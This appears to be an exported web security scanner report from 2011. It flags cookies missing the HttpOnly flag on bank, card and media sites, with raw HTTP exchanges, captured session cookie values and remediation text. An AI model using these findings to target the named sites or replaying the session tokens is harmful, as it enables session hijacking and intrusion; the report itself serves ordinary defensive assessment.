HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Thu, 03 Feb 2011 01:17:43 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promos/jump/greatdeals/ HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:12 GMT Content-type: magnus-internal/cold-fusion Set-Cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.bankofamerica.com; secure Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir= Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /overview/overview.asp HTTP/1.1 Host: careers.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:01:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 40467 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQSBBASC=BDAGOJOAAKJHPBJKHEJODHFO; path=/ Cache-control: private
<!-- Header --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Desc ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /career/careerhome HTTP/1.1 Host: careers.jpmorganchase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:20 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer:6.3.0 Set-Cookie: JpmcSession=TzkVNJxJQrS0gzJv15V8Vrx2QzN9B6kLwsGv8cCv6MNQVGfj6sk1!-872331758; path=/ X-Powered-By: Servlet/2.4 JSP/2.0 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="../CSS/code/white4.css" re ...[SNIP]...
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licence/1043255/script.cgi?lang=en&groups=0 HTTP/1.1 Host: chat.livechatinc.net Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-type: application/x-javascript; Set-Cookie: lc_session=S1296685494.aa93f77b42&lc_last_visit=1296685494&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Fri, 01-Feb-2013 23:24:54 GMT; domain=chat.livechatinc.net; P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 11722 Connection: Keep-Alive
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: corporate.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
TestSess3=70221296686701068830717;path=/
CoreID6=70221296686701068830717; path=/; expires=Sun, 01 Feb 2026 22:45:01 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm HTTP/1.1 Host: data.coremetrics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:45:01 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Set-Cookie: CoreID6=70221296686701068830717; path=/; expires=Sun, 01 Feb 2026 22:45:01 GMT Set-Cookie: TestSess3=70221296686701068830717;path=/ Location: /cm?cvdone=p Keep-Alive: timeout=300, max=988 Connection: Keep-Alive Content-Type: text/plain; charset=UTF-8 Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /icg/global_banking/index.jsp HTTP/1.1 Host: icg.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:11:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=pmRyNJWTrlhWs4CMfhxWwsp80LHT4LhB6XJg6bHB5JvPWnb5GRyz!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /icg/global_markets/index.jsp HTTP/1.1 Host: icg.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:11:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=hKTpNJWTyzHxTpySqDY5L1tn7Xt0pH1zvGG6h2GrTDnnCgT2GD8y!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: learn.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/gen3loc/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=1855EA832F144EB2386254CA5EA62C0D.ftb-web3; Path=/locator/gen3loc Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/gen3loc Location: http://locators.bankofamerica.com/locator/gen3loc/jsp/index.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/locator/LocatorAction.do HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=DB67375326A3DF6B103B3EB5CE101EA1.ftb-web1; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/LocatorAction.do?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=d2m29fhd3k250v7inbf5p7la41; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: lovely-faces.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 20:21:13 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=d2m29fhd3k250v7inbf5p7la41; path=/ Last-Modified: Sat, 05 Feb 2011 09:23:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 30648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/access.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/contact.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/assistance/lost.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/buxx.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/credit.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/debit.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/gift.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/prepaid.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/readylink.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/cards/travelmoney.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/discounts/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/index.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/legal.jsp HTTP/1.1 Host: m.usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/military/login.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mfnfopwd/ HTTP/1.1 Host: myaccountsaws.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:06 GMT Server: IBM_HTTP_Server Content-Length: 12458 Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US
<?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
